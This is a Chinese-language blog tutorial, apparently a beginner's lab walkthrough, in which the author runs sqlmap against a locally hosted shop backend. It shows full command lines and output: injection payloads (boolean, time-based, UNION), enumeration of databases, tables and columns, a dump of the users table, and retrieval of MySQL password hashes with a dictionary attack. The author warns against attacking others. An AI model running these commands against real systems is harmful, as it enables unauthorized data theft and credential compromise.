SQL注入:Sqlmap初体验
目录
sqlmap
Sqlmap 是一个开源的渗透测试工具,可以自动检测和利用 SQL 注入缺陷以及接管数据库服务器的过程。它有一个强大的检测引擎,许多针对最终渗透测试人员的小众功能,以及从数据库指纹、从数据库获取数据、访问底层文件系统和通过带外连接在操作系统上执行命令等广泛的开关。
安装
pip install sqlmap
查看帮助文档
sqlmap -hh
中文文档
直连数据库
服务型数据库(mysql)
DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME
sqlmap -d "mysql://root:123456@127.0.0.1:3306/uniapp_shop" -f --banner --dbs --users
文件型数据库(sqlite)
DBMS://DATABASE_FILEPATH
sqlmap -d "sqlite3://D:\apiTestDjango\db.sqlite3" -f --banner --dbs --tables
初级实战
此处使用的是本地的服务,目的在于学习sqlmap的使用,请不要做违法的事情
扫描项目源码为: https://gitee.com/zy7y/uniapp_shop_server
1. 扫描注入点
命令:sqlmap -u http://127.0.0.1/v1/getnews?newid=1
(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1
___
__H__
___ ___[,]_____ ___ ___ {1.5.5#pip}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l
aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:34:37 /2021-05-14/
[13:34:37] [INFO] resuming back-end DBMS 'mysql'
[13:34:37] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newid=13 AND 6236=6236
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: newid=13 AND (SELECT 8333 FROM (SELECT(SLEEP(5)))cUBu)
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: newid=13 UNION ALL SELECT CONCAT(0x716a6a7a71,0x664e6179557179534a494d4b7a6a4b4263744562646f716151716744516c75476f6774666345424e,0x71786b7a71),NULL,NULL,NULL,NULL-- -
---
[13:34:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[13:34:37] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'
[*] ending @ 13:34:37 /2021-05-14/
# Title: Generic UNION query (NULL) - 5 columns 注入点
2. 根据注入点查到全部数据库 --dbs
命令:sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --dbs
(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --dbs
___
__H__
___ ___[']_____ ___ ___ {1.5.5#pip}
|_ -| . ['] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l
aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:40:12 /2021-05-14/
[13:40:12] [INFO] resuming back-end DBMS 'mysql'
[13:40:12] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newid=13 AND 6236=6236
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: newid=13 AND (SELECT 8333 FROM (SELECT(SLEEP(5)))cUBu)
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: newid=13 UNION ALL SELECT CONCAT(0x716a6a7a71,0x664e6179557179534a494d4b7a6a4b4263744562646f716151716744516c75476f6774666345424e,0x71786b7a71),NULL,NULL,NULL,NULL-- -
---
[13:40:12] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[13:40:12] [INFO] fetching database names
available databases [6]:
[*] atplant
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] uniapp_shop
[13:40:12] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'
[*] ending @ 13:40:12 /2021-05-14/
3. 根据指定数据库来查所有表
命令:sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D uniapp_shop --tables
(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D uniapp_shop --tables
___
__H__
___ ___[.]_____ ___ ___ {1.5.5#pip}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l
aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 14:57:46 /2021-05-14/
[14:57:47] [INFO] resuming back-end DBMS 'mysql'
[14:57:47] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newid (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: newid=1 AND (SELECT 3711 FROM (SELECT(SLEEP(5)))aMmf)
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: newid=1 UNION ALL SELECT NULL,CONCAT(0x7162626b71,0x456a5258416472737a767a5a6d624b5448444b52745770566c4e67646c58666d474376737a6f476c,0x7170706271),NULL,NULL,NULL-- -
---
[14:57:47] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[14:57:47] [INFO] fetching tables for database: 'uniapp_shop'
Database: uniapp_shop
[36 tables]
+----------------------------+
| dt_article |
| dt_article_albums |
| dt_article_attach |
| dt_article_attribute_field |
| dt_article_attribute_value |
| dt_article_category |
| dt_article_comment |
| dt_brands |
| dt_channel |
| dt_channel_field |
| dt_channel_site |
| dt_express |
| dt_feedback |
| dt_link |
| dt_mail_template |
| dt_manager |
| dt_manager_log |
| dt_manager_role |
| dt_manager_role_value |
| dt_navigation |
| dt_order_goods |
| dt_orders |
| dt_payment |
| dt_sms_template |
| dt_user_amount_log |
| dt_user_attach_log |
| dt_user_code |
| dt_user_group_price |
| dt_user_groups |
| dt_user_login_log |
| dt_user_message |
| dt_user_oauth |
| dt_user_oauth_app |
| dt_user_point_log |
| dt_user_recharge |
| dt_users |
+----------------------------+
[14:57:47] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'
[*] ending @ 14:57:47 /2021-05-14/
3.根据表来爆字段(mysql版本>5.0)
命令:sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D uniapp_shop -T dt_users --columns
(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D uniapp_shop -T dt_users --columns
___
__H__
___ ___[)]_____ ___ ___ {1.5.5#pip}
|_ -| . [)] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l
aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 14:59:01 /2021-05-14/
[14:59:01] [INFO] resuming back-end DBMS 'mysql'
[14:59:01] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newid (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: newid=1 AND (SELECT 3711 FROM (SELECT(SLEEP(5)))aMmf)
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: newid=1 UNION ALL SELECT NULL,CONCAT(0x7162626b71,0x456a5258416472737a767a5a6d624b5448444b52745770566c4e67646c58666d474376737a6f476c,0x7170706271),NULL,NULL,NULL-- -
---
[14:59:01] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[14:59:01] [INFO] fetching columns for table 'dt_users' in database 'uniapp_shop'
Database: uniapp_shop
Table: dt_users
[22 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| exp | int |
| address | varchar(255) |
| amount | double |
| area | varchar(255) |
| avatar | varchar(255) |
| birthday | timestamp |
| email | varchar(50) |
| group_id | int |
| id | int |
| mobile | varchar(20) |
| msn | varchar(100) |
| nick_name | varchar(100) |
| password | varchar(100) |
| point | int |
| qq | varchar(20) |
| reg_ip | varchar(20) |
| reg_time | timestamp |
| salt | varchar(20) |
| sex | varchar(20) |
| status | int |
| telphone | varchar(50) |
| user_name | varchar(100) |
+-----------+--------------+
[14:59:02] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'
[*] ending @ 14:59:02 /2021-05-14/
4. 根据字段名查到表中的数据
注意:当使用了--dump 已经触法了法律,请不要恶意攻击他人服务
命令:sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --batch -D uniapp_shop -T dt_users -C user_name,id --dump
(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --batch -D uniapp_shop -T dt_users -C user_name,id --dump
___
__H__
___ ___[']_____ ___ ___ {1.5.5#pip}
|_ -| . [)] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l
aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:03:52 /2021-05-14/
[15:03:52] [INFO] resuming back-end DBMS 'mysql'
[15:03:52] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newid (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: newid=1 AND (SELECT 3711 FROM (SELECT(SLEEP(5)))aMmf)
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: newid=1 UNION ALL SELECT NULL,CONCAT(0x7162626b71,0x456a5258416472737a767a5a6d624b5448444b52745770566c4e67646c58666d474376737a6f476c,0x7170706271),NULL,NULL,NULL-- -
---
[15:03:52] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[15:03:52] [INFO] fetching entries of column(s) 'id,user_name' for table 'dt_users' in database 'uniapp_shop'
Database: uniapp_shop
Table: dt_users
[1 entry]
+-----------+----+
| user_name | id |
+-----------+----+
| test | 1 |
+-----------+----+
[15:03:53] [INFO] table 'uniapp_shop.dt_users' dumped to CSV file 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1\dump\uniapp_shop\dt_users.csv'
[15:03:53] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'
[*] ending @ 15:03:53 /2021-05-14/
5. 获取当前数据库用户及hash密码
命令: sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --passwords
(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --passwords
___
__H__
___ ___[(]_____ ___ ___ {1.5.5#pip}
|_ -| . ['] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l
aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 14:40:02 /2021-05-14/
[14:40:02] [INFO] resuming back-end DBMS 'mysql'
[14:40:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newid=13 AND 6236=6236
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: newid=13 AND (SELECT 8333 FROM (SELECT(SLEEP(5)))cUBu)
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: newid=13 UNION ALL SELECT CONCAT(0x716a6a7a71,0x664e6179557179534a494d4b7a6a4b4263744562646f716151716744516c75476f6774666345424e,0x71786b7a71),NULL,NULL,NULL,NULL-- -
---
[14:40:02] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[14:40:02] [INFO] fetching database users password hashes
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] y
[14:40:05] [WARNING] no clear password(s) found
database management system users password hashes:
[*] develop [1]:
password hash: $A$005$~W\\u0005K\\u000b\\u0017d\\u0013\\u0002*4j_s Qg\\u0007\\u0015\\u0001GlIeJWW2iJzFpb0bGTlr5.6kBD1hAQt2iQefbUbepKD
[*] mysql.infoschema [1]:
password hash: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED
[*] mysql.session [1]:
password hash: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED
[*] mysql.sys [1]:
password hash: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED
[*] root [2]:
password hash: $A$005$\\u0013`|dCsg\\u0001^)_s\\u001dL\\u0010n-jx^61Eh8FZrw86xs/5fy7xSwpJ9rmmaZ9iyou1PCK74aRC
password hash: $A$005$z#r<]P\\u000eneGN\\u0014P_m\\u0007tk&av.YQwaEJ5AqX5Mv9.OiaWV/IlOiYM.C3veKIaAjpwq3
[14:40:05] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'
[*] ending @ 14:40:05 /2021-05-14/
最后
请不要恶意使用其来攻击他人服务,不要触碰法律,高级用法请查看官方文档
参考资料
SQL注入:Sqlmap初体验的更多相关文章
- Spring JDBCTemplate连接SQL Server之初体验
前言 在没有任何框架的帮助下我们操作数据库都是用jdbc,耗时耗力,那么有了Spring,我们则不用重复造轮子了,先来试试Spring JDBC增删改查,其中关键就是构造JdbcTemplate类. ...
- SQL注入--SQLMap过WAF
单引号被过滤情况: 空格.等号未被过滤情况: select被过滤情况: 以此类推,当sqlmap注入出现问题时,比如不出数据,就要检查对应的关键词是否被过滤. 比如空格被过滤可以使用space2com ...
- 一次对真实网站的SQL注入———SQLmap使用
网上有许多手工注入SQL的例子和语句,非常值得我们学习,手工注入能让我们更加理解网站和数据库的关系,也能明白为什么利用注入语句能发现网站漏洞. 因为我是新手,注入语句还不太熟悉,我这次是手注发现的注点 ...
- Saturday SQL Server 2016 初体验
最近在开发一个有关数据库的项目,我想用SQLite,但是SQLite的设计器不是特别友好,然后据说VS有一个集成的SQLite设计器,但是我用的VS2017亲测并没有,用户体验不佳,所以安装一个SQL ...
- 普通SQL注入
安全防御:过滤/转义非法参数,屏蔽SQL查询错误. 工具:Firefox,hackbar,sqlmap,burpsuite 1.联想tms站 例1, 联想tms站fromCity参数存在普通SQL注入 ...
- SQL注入(dvwa环境)
首先登录DVWA主页: 1.修改安全级别为LOW级(第一次玩别打脸),如图中DVWA Security页面中. 2.进入SQL Injection页面,出错了.(心里想着这DVWA是官网下的不至于玩不 ...
- 2017-2018-2 20179204《网络攻防实践》第十一周学习总结 SQL注入攻击与实践
第1节 研究缓冲区溢出的原理,至少针对两种数据库进行差异化研究 1.1 原理 在计算机内部,输入数据通常被存放在一个临时空间内,这个临时存放的空间就被称为缓冲区,缓冲区的长度事先已经被程序或者操作系统 ...
- sql注入知识点
需找sql注入点1\无特定目标inurl:.php?id= 2\有特定目标:inurl:.php?id= site:target.com 3\工具爬取spider,对搜索引擎和目标网站的链接进行爬取 ...
- 防止sql注入和sqlmap介绍
sql注入问题从WEB诞生到现在也一直没停过,各种大小公司都出现过sql注入问题,导致被拖库,然后存在社工库撞库等一系列影响. 防止sql注入个人理解最主要的就一点,那就是变量全部参数化,能根本的解决 ...
随机推荐
- HDU_6695 Welcome Party 【思维】
一.题目 Welcome Party 二.分析 最开始的时候分析错了,认为只要找两个类型中的最小差值就可以了,忽略了是求两个类型中最大值的最小差值. 那么可以对第一个类型进行从大到小排序,枚举这个类型 ...
- Django之模版层
一.模版简介 你可能已经注意到我们在例子视图中返回文本的方式有点特别,也就是说,HTML被直接硬编码在python代码之中. def current_datetime(request): now = ...
- IPFS挖矿必须要托管吗?
IPFS 本质上只是一个人人使用的协议,而 Filecoin 是 IPFS 的激励层,大家平时说的 IPFS 挖矿,其实就是挖 Filecoin.而提到IPFS 就不得不说到矿机托管的问题. 点击了解 ...
- POJ2635(数论+欧拉筛+大数除法)
题目链接:https://vjudge.net/problem/POJ-2635 题意:给定一个由两个质数积的大数M和一个数L,问大数M的其中较小的质数是否小于L. 题解:因为大数M已经超过long ...
- 在Ubuntu上安装TensorFlow-GPU开发环境
深度学习是一个比较复杂的体系,今天记录一下开发环境的搭建步骤. 全新安装Ubuntu 20.10,系统默认安装的是python3,查看python的版本: mango@ubuntu:~$ python ...
- 从I/O多路复用到Netty,还要跨过Java NIO包
本文是Netty系列第4篇 上一篇文章我们深入了解了I/O多路复用的三种实现形式,select/poll/epoll. 那Netty是使用哪种实现的I/O多路复用呢?这个问题,得从Java NIO包说 ...
- 回忆那些年我玩过的ide,看看哪些你也玩过,看图回忆
闲来无聊,回忆一下这些年玩过的ide.看看哪些你也玩过. QBasic 第一个ide,兴奋程度也是最大的,从此进入了码农行列 VisualBasic 可以拖界面了,成就感爆棚 Turbo C c语言, ...
- Android Stuio让我濒临崩溃的bug之cause: unable to find valid certification path to requested target
•问题描述 像往常一样,打开 $android studio$ 开启愉快的开发之旅: 写着写着,右下角弹出一个对话,说 $android studio$ 有新版本可更新: 有新版本为何不用,果断点击 ...
- C语言之预处理详解
C语言之预处理详解 纲要: 预定义符号 #define #define定义标识符 #define定义宏 #define的替换规则 #与## 几点注意#undef 带副作用的宏参数 宏和函数的对比 命名 ...
- [矩阵乘法]裴波拉契数列II
[ 矩 阵 乘 法 ] 裴 波 拉 契 数 列 I I [矩阵乘法]裴波拉契数列II [矩阵乘法]裴波拉契数列II Description 形如 1 1 2 3 5 8 13 21 34 55 89 ...